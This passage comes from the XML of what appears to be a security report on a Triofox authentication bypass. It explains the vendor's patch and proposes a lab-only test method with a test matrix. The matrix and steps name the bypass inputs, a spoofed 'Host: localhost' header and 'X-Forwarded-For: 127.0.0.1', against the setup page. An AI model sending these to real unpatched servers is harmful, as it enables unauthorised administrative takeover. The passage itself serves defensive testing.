              <w:t>, renamed tunnelling tools, and RDP-over-SSH. This is what actually worked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3–6 (detects)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>8.2  How the vendor fix works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rapid7's analysis of the patch confirms the fix is exactly the server-side correction the analysis predicts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. In 16.7.10368.56560, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Host == localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> comparison is removed entirely; the origin check now uses the socket-level client address rather than a header-derived value, requests carrying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> are rejected, and the setup pages </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MigrateDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> additionally require a valid session with cluster-admin status, redirecting to the login page otherwise. The fix moves the trust decision from a value the client controls to one the server observes, and it closes the initialisation surface after setup. Both of the design faults identified in the A06 analysis are addressed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>8.3  Proposed authorised-lab testing methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The following is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[proposed]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> methodology for an authorised lab instance, not a record of tests performed. It is deliberately manual where the flaw class demands it. Table 6 gives a test matrix with expected outcomes; the “expected result” column states what a correctly behaving patched system should do, and must not be read as an observed finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope and authorise. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Stand up Triofox in an isolated VM with written authorisation. Never test production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Baseline the control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Request AdminDatabase.aspx normally and confirm the AccessDenied redirect, establishing that a control is nominally present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Hypothesise client-controlled trust. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Form the hypothesis that the redirect depends on a client-supplied value, and enumerate candidates: Host, X-Forwarded-For, Referer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Test the header variant. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Re-issue the request with Host: localhost and observe whether access is granted. On an unpatched instance this is the bypass; on a patched one it should not be.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Trace the workflow, do not weaponise it. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>If access is granted, document that the setup workflow becomes reachable. Stop short of creating accounts or executing code on anything but a disposable lab host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the privileged feature. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Inspect whether the anti-virus path setting runs with SYSTEM rights and whether the executable is validated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="269" w:lineRule="auto"/>
        <w:ind w:left="397" w:hanging="397"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Confirm that access control failures and anomalous setup-page access generate alertable events at a layer outside the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Proposed test matrix. Expected results describe correct behaviour, not observed findings.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="3855"/>
        <w:gridCol w:w="2948"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expected result (patched)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Normal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Default headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Redirect to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AccessDenied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Host-header override</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Host: localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Access denied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Forwarded-for override</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>X-Forwarded-For: 127.0.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Post-setup re-access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valid setup URL after install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Redirect to login (session required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:vAlign w:val="center"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>AV path configuration</w:t>
